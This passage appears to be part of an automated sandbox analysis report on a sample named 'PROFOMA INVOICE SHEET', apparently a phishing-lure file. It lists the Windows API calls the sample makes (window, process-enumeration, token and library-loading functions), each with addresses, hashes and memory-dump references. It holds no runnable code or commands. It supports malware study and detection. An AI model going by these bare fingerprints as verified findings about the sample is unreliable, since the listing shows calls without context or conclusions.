                                    • Opcode ID: 0ca82f43ecf73bff78a7cdc7224bfe7fa2987e61ac5188dfd6ad9bc7fe10213d
                                    • Instruction ID: a7286d5ec30854848a7bf3d95cc57a6877944e77ea0036c35614842f25a55bcc
                                    • Opcode Fuzzy Hash: 0ca82f43ecf73bff78a7cdc7224bfe7fa2987e61ac5188dfd6ad9bc7fe10213d
                                    • Instruction Fuzzy Hash: A5417A34A19214EFCF13CF98D894EA9B7F9BB49354F1A40A9E8149B2A1C731A941CB90
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 003916EB
                                      • Part of subcall function 00363A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00363A57
                                      • Part of subcall function 00363A3D: GetCurrentThreadId.KERNEL32 ref: 00363A5E
                                      • Part of subcall function 00363A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003625B3), ref: 00363A65
                                    • GetCaretPos.USER32(?), ref: 003916FF
                                    • ClientToScreen.USER32(00000000,?), ref: 0039174C
                                    • GetForegroundWindow.USER32 ref: 00391752
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    • Opcode ID: 615a5a706cde827a99276dd141cca80e5ce5d41b7bcac3092f7bddb811c10863
                                    • Instruction ID: 19dd0e09aca456d85433144c2c76dcb6ed199e81c60f8c8ecf6db457253fe5cf
                                    • Opcode Fuzzy Hash: 615a5a706cde827a99276dd141cca80e5ce5d41b7bcac3092f7bddb811c10863
                                    • Instruction Fuzzy Hash: 1B316475D01149AFDB01EFA9C891CAEB7FDEF48304B5080AAE415EB251DB31DE45CBA1
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0036D501
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0036D50F
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0036D52F
                                    • CloseHandle.KERNEL32(00000000), ref: 0036D5DC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 67b13becbdc5dfa8fda5a3a6a0ad140c60d315b7ecf925c18443af635b8d1852
                                    • Instruction ID: a0ebf017322b86793bf5702213da037e111a694473ca7b3703aba5fc2805a7a2
                                    • Opcode Fuzzy Hash: 67b13becbdc5dfa8fda5a3a6a0ad140c60d315b7ecf925c18443af635b8d1852
                                    • Instruction Fuzzy Hash: 9931B8715083009FD306EF54C891AAFBBF8EF99354F14452DF582871A2EB719944CB92
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • GetCursorPos.USER32(?), ref: 00399001
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00357711,?,?,?,?,?), ref: 00399016
                                    • GetCursorPos.USER32(?), ref: 0039905E
                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00357711,?,?,?), ref: 00399094
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                    • String ID:
                                    • API String ID: 2864067406-0
                                    • Opcode ID: 872ea858dd46cef540e8b6408dd401d6ebef430ec81e9b7a312b0b13191c192c
                                    • Instruction ID: 226593210f522485851ced0d9c60dd56910e959b8844acb4dbf206e6a507b2d5
                                    • Opcode Fuzzy Hash: 872ea858dd46cef540e8b6408dd401d6ebef430ec81e9b7a312b0b13191c192c
                                    • Instruction Fuzzy Hash: 15219F35600018FFCF278F99D858FEA7BB9EB4A350F05409AF9154B261C3329DA0DB60
                                    APIs
                                    • GetFileAttributesW.KERNEL32(?,0039CB68), ref: 0036D2FB
                                    • GetLastError.KERNEL32 ref: 0036D30A
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0036D319
                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0039CB68), ref: 0036D376
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                    • String ID:
                                    • API String ID: 2267087916-0
                                    • Opcode ID: 5dfb24459bcb769a3739decd0f95d868b2440112b017dd7b9dee66015e0a3f46
                                    • Instruction ID: 3cb4116b9cda4b7d60617fb38762c21624f6dfd7c47aeb4775325f818bd176f8
                                    • Opcode Fuzzy Hash: 5dfb24459bcb769a3739decd0f95d868b2440112b017dd7b9dee66015e0a3f46
                                    • Instruction Fuzzy Hash: 3A21A374A053019FC712DF28C88186A77E8EE56324F608A1EF499CB3E1E731D945CB93
                                    APIs
                                      • Part of subcall function 00361014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0036102A
                                      • Part of subcall function 00361014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00361036
                                      • Part of subcall function 00361014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00361045
                                      • Part of subcall function 00361014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0036104C
                                      • Part of subcall function 00361014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00361062
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003615BE
                                    • _memcmp.LIBVCRUNTIME ref: 003615E1
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00361617
                                    • HeapFree.KERNEL32(00000000), ref: 0036161E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 1592001646-0
                                    • Opcode ID: 950a2733087c1aba0386404427ce0fcdda6825f2c86385052e47685fc958c124
                                    • Instruction ID: eae9c7da524c09775642fc981fdc018adb8f3fc6023fadf3baf4a96723340a4d
                                    • Opcode Fuzzy Hash: 950a2733087c1aba0386404427ce0fcdda6825f2c86385052e47685fc958c124
                                    • Instruction Fuzzy Hash: 8A21AC31E00108EFDF11DFA8C945BEEBBB8EF44354F098459E841AB245E731AA05CBA0
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0039280A
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00392824
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00392832
                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00392840
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Long$AttributesLayered
                                    • String ID:
                                    • API String ID: 2169480361-0
                                    • Opcode ID: 4551b7c7d05713d682700c644cd58dda3fe3cdde7d9d83d3204f510d141478a7
                                    • Instruction ID: 785846d1ff8323ab5d78cbeef98c46ca3634128c93a37271dbf8eb97a5c4d06a
                                    • Opcode Fuzzy Hash: 4551b7c7d05713d682700c644cd58dda3fe3cdde7d9d83d3204f510d141478a7
                                    • Instruction Fuzzy Hash: E521C131209911BFDB16DB24CC54FAB7B99AF46324F158159F4268B6E2CB71FC42C790
                                    APIs
                                      • Part of subcall function 00368D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0036790A,?,000000FF,?,00368754,00000000,?,0000001C,?,?), ref: 00368D8C
                                      • Part of subcall function 00368D7D: lstrcpyW.KERNEL32(00000000,?,?,0036790A,?,000000FF,?,00368754,00000000,?,0000001C,?,?,00000000), ref: 00368DB2
                                      • Part of subcall function 00368D7D: lstrcmpiW.KERNEL32(00000000,?,0036790A,?,000000FF,?,00368754,00000000,?,0000001C,?,?), ref: 00368DE3
                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00368754,00000000,?,0000001C,?,?,00000000), ref: 00367923
                                    • lstrcpyW.KERNEL32(00000000,?,?,00368754,00000000,?,0000001C,?,?,00000000), ref: 00367949
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00368754,00000000,?,0000001C,?,?,00000000), ref: 00367984
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: 05cfb0dcecea5010dfc32a6ac210764bd2c1d51899452ee7f942d983194c5d41
                                    • Instruction ID: aa18a0df29c8ba94f40c7b1cdcdd2206ab1dd654a0068e95bd31b12cb03a46fe
                                    • Opcode Fuzzy Hash: 05cfb0dcecea5010dfc32a6ac210764bd2c1d51899452ee7f942d983194c5d41
                                    • Instruction Fuzzy Hash: 6611E93A204302AFDB165F39D845D7A77E9FF49354B50802AF946CB268EB719811C761
                                    APIs
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00397D0B
                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00397D2A
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00397D42
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0037B7AD,00000000), ref: 00397D6B
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID:
                                    • API String ID: 847901565-0
                                    • Opcode ID: 1983dabb9276a7234804a1d8723bf5ed55687e25889598eb1cecf75cc71ca0d4
                                    • Instruction ID: a29dc8f63fc6a2ff68c73c5e1dd025ecf8eefc55157d7ffff7d0891f72abaad2
                                    • Opcode Fuzzy Hash: 1983dabb9276a7234804a1d8723bf5ed55687e25889598eb1cecf75cc71ca0d4
                                    • Instruction Fuzzy Hash: 8311CD72225615AFCF129F28DC04AA63BA8AF46360F168325F839CB2F0D7318D51CB90
                                    APIs
                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 003956BB
                                    • _wcslen.LIBCMT ref: 003956CD
                                    • _wcslen.LIBCMT ref: 003956D8
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00395816
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend_wcslen
                                    • String ID:
                                    • API String ID: 455545452-0
                                    • Opcode ID: 72603451784b724a873bd395ddeb58093b905250de9664af8827f7b9a16dc184
                                    • Instruction ID: 52a5da446298e0708086a5efaa79fcc6531182bdfd67c79bc480685c7769914f
                                    • Opcode Fuzzy Hash: 72603451784b724a873bd395ddeb58093b905250de9664af8827f7b9a16dc184
                                    • Instruction Fuzzy Hash: 4211B275A04618A6DF23DFA5DC85AEE77BCEF11764F104026FA15DA081EBB0DAC4CB60
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00361A47
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00361A59
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00361A6F
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00361A8A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: b8428e4e2bfffcfb6238df97931f41e1bd0cec4c39c3835f1f3b439f52115ead
                                    • Instruction ID: caae8b7b2bdfee8e235a8f049898be653de5ba864de9f78c0109a7fb334899e9
                                    • Opcode Fuzzy Hash: b8428e4e2bfffcfb6238df97931f41e1bd0cec4c39c3835f1f3b439f52115ead
                                    • Instruction Fuzzy Hash: CF11573A901219FFEB11DBA4C984FADFB78EB08350F244092EA00B7294C671AE50DB94
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 0036E1FD
                                    • MessageBoxW.USER32(?,?,?,?), ref: 0036E230
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0036E246
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0036E24D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2880819207-0
                                    • Opcode ID: 8d81a8bd7a941b7bff3c1e23a7b1eefb27013e7acc417d4ff1766c0bef8b10ff
                                    • Instruction ID: d73be572cea52244055b989ca57058c9da19d4f8835db785cc89846cc309cb21
                                    • Opcode Fuzzy Hash: 8d81a8bd7a941b7bff3c1e23a7b1eefb27013e7acc417d4ff1766c0bef8b10ff
                                    • Instruction Fuzzy Hash: 5711DBBA904254BFC703AFA8EC09A9E7FADAB45310F048656F924D3291D675CD0487A0
                                    APIs
                                    • CreateThread.KERNEL32(00000000,?,0032CFF9,00000000,00000004,00000000), ref: 0032D218
                                    • GetLastError.KERNEL32 ref: 0032D224
                                    • __dosmaperr.LIBCMT ref: 0032D22B
                                    • ResumeThread.KERNEL32(00000000), ref: 0032D249
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                    • String ID:
                                    • API String ID: 173952441-0
                                    • Opcode ID: 357f0872078b149449058ff340c7ae502c64beb4f62b61801b17546bbcef6652
                                    • Instruction ID: e4c6455111882b0ebff985dda2b44b5500fc97d66527ead06431fa0bd2f571ff
                                    • Opcode Fuzzy Hash: 357f0872078b149449058ff340c7ae502c64beb4f62b61801b17546bbcef6652
                                    • Instruction Fuzzy Hash: 5801D636415224BBDB135BA5FC09BAE7A6DDF81330F114619F925961D0CB718901C7A0
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0030604C
                                    • GetStockObject.GDI32(00000011), ref: 00306060
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0030606A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateMessageObjectSendStockWindow
                                    • String ID:
                                    • API String ID: 3970641297-0
                                    • Opcode ID: 19a85b3c0556e7fc41b753f609be75f34273f6c1d86b06fd3f7a192d2371dd0e
                                    • Instruction ID: e383ed6c443f0d0aeb7d6af15935e455b3a0fd92dececc416b7103ab455dfade
                                    • Opcode Fuzzy Hash: 19a85b3c0556e7fc41b753f609be75f34273f6c1d86b06fd3f7a192d2371dd0e
                                    • Instruction Fuzzy Hash: 1B11AD72506508BFEF134FA4DC65EEBBBADEF083A4F050212FA0452050C7329C60EBA0
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00323B56
                                      • Part of subcall function 00323AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00323AD2
                                      • Part of subcall function 00323AA3: ___AdjustPointer.LIBCMT ref: 00323AED
                                    • _UnwindNestedFrames.LIBCMT ref: 00323B6B
                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00323B7C
                                    • CallCatchBlock.LIBVCRUNTIME ref: 00323BA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                    • String ID:
                                    • API String ID: 737400349-0
                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                    • Instruction ID: dbbde2bc19ad5f165bace0c7f5b6639489c8659eaba3721a26f2f14f74f134bc
                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                    • Instruction Fuzzy Hash: 8E012932100158BBDF126E95EC42EEB3F6AEF48754F054014FE485A121C736E961DBA0
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003013C6,00000000,00000000,?,0033301A,003013C6,00000000,00000000,00000000,?,0033328B,00000006,FlsSetValue), ref: 003330A5
                                    • GetLastError.KERNEL32(?,0033301A,003013C6,00000000,00000000,00000000,?,0033328B,00000006,FlsSetValue,003A2290,FlsSetValue,00000000,00000364,?,00332E46), ref: 003330B1
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0033301A,003013C6,00000000,00000000,00000000,?,0033328B,00000006,FlsSetValue,003A2290,FlsSetValue,00000000), ref: 003330BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: b57bb966ea9cb284127da47aae9801c83b5a5819ef024d0996b3bb4230a484a5
                                    • Instruction ID: cae997e08d151ba5c9f21f74adae561b39da591f4079c25e63c5e548ea603be0
                                    • Opcode Fuzzy Hash: b57bb966ea9cb284127da47aae9801c83b5a5819ef024d0996b3bb4230a484a5
                                    • Instruction Fuzzy Hash: 2001F732312622ABCB374B78ACC4A677B9CAF05B61F218621F947E7150C722D901C6E0
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0036747F
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00367497
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003674AC
                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003674CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Type$Register$FileLoadModuleNameUser
                                    • String ID:
                                    • API String ID: 1352324309-0
                                    • Opcode ID: b65c2e5ce0abc87eca89d46d7c57f785ff4c23b257e5df0a7d2e10acf35501fb
                                    • Instruction ID: d5f8b7b332f0cc16d14d418bf6336d474e9810714e341f22e134477d39b633e3
                                    • Opcode Fuzzy Hash: b65c2e5ce0abc87eca89d46d7c57f785ff4c23b257e5df0a7d2e10acf35501fb
                                    • Instruction Fuzzy Hash: 2D11E1B02053009BE7238F16DD0CBA27BFCEB00B08F90C16AA616D6055DB71E904CB60
                                    APIs
